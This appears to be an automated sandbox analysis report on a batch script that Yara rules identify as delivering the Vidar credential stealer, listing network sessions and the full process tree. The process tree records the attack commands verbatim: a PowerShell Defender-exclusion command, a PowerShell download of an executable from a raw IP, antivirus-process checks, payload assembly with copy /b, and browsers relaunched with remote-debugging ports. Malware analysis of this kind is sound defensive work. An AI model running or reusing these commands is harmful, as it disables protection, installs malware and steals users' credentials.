                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:14 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
2024-12-27 06:11:14 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.6 | 50072 | 162.159.61.3 | 443 | 3880 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:13 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
2024-12-27 06:11:14 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726eb1f954393-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.6 | 50085 | 162.159.61.3 | 443 | 3880 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:13 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
2024-12-27 06:11:13 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726eb0d7441d2-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.6 | 50078 | 162.159.61.3 | 443 | 3880 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:13 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
2024-12-27 06:11:14 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726eb3ceec425-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.6 | 50071 | 162.159.61.3 | 443 | 3880 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:13 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
2024-12-27 06:11:14 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 06:11:13 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f8726eb4f38729b-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.6 | 50084 | 162.159.61.3 | 443 | 3880 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:13 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-27 06:11:14 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 06:11:13 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f8726eb2d7b43f8-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.6 | 50079 | 162.159.61.3 | 443 | 3880 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:13 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-27 06:11:14 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 06:11:13 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f8726ebcf7c4299-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
49 | 192.168.2.6 | 50091 | 162.159.61.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:14 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-27 06:11:15 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 06:11:15 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f8726f2fdf043a9-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom,A)


Session ID:50
Source IP:192.168.2.6
Source Port:50092
Destination IP:162.159.61.3
Destination Port:443
Timestamp  Bytes transferred  Direction  Data
2024-12-27 06:11:14 UTC  245  OUT  POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
2024-12-27 06:11:15 UTC  247  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:15 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726f37ceede94-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom(A)


Session ID:51
Source IP:192.168.2.6
Source Port:50093
Destination IP:162.159.61.3
Destination Port:443
Timestamp  Bytes transferred  Direction  Data
2024-12-27 06:11:14 UTC  245  OUT  POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
2024-12-27 06:11:15 UTC  247  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:15 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726f3c8b0de92-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom+A)


                                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                                            Start time:01:09:06
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" "
                                                                                                                                                                                                                                                                            Imagebase:0x7ff784bd0000
                                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                                            Start time:01:09:06
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                                            Start time:01:09:07
                                                                                                                                                                                                                                                                            Start date:27/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
Imagebase:0x7ff6e3d50000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:01:09:12
Start date:27/12/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff717f30000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:01:09:18
Start date:27/12/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):false
Commandline:timeout /t 10 /nobreak
Imagebase:0x7ff60de80000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:01:09:28
Start date:27/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"
Imagebase:0x7ff6e3d50000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:01:09:40
Start date:27/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:14
Start time:01:09:43
Start date:27/12/2024
Path:C:\Users\user\AppData\Local\Temp\putt.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\putt.exe"
Imagebase:0x400000
File size:1'273'852 bytes
MD5 hash:5782BEA403267E4A6DDF82263332ED59
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 5%, ReversingLabs
Reputation:low
Has exited:true

Target ID:15
Start time:01:09:44
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:16
Start time:01:09:44
Start date:27/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID: 17
Start time: 01:09:47
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0xcb0000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 01:09:47
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /I "opssvc wrsa"
Imagebase: 0x6d0000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 01:09:47
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0xcb0000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 01:09:47
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase: 0x6d0000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 01:09:49
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c md 105235
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 01:09:49
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit): true
Commandline: extrac32 /Y /E Authorization
Imagebase: 0x910000
File size: 29'184 bytes
MD5 hash: 9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 01:09:50
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V "aid" Division
Imagebase: 0x7ff66e660000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 01:09:50
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 01:09:50
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID:26
Start time:01:09:50
Start date:27/12/2024
Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Wow64 process (32bit):true
Commandline:Inf.com m
Imagebase:0x6f0000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:false

Target ID:27
Start time:01:09:50
Start date:27/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0x5e0000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:01:10:48
Start date:27/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff684c40000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:01:10:49
Start date:27/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2332,i,17273091767045928010,3792722135638542356,262144 /prefetch:8
Imagebase:0x7ff684c40000
File size:3'242'272 bytes
MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:01:11:02
Start date:27/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:01:11:04
Start date:27/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:36
Start time:01:11:04
Start date:27/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2632,i,14551711620527519390,4323206914128980996,262144 /prefetch:3
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                                                            Start time:01:11:04
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:3
                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                                                                            Start time:01:11:09
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5340 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                                                            Start time:01:11:09
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6652 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                                                            Start time:01:11:10
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                            Has administrator privileges:false
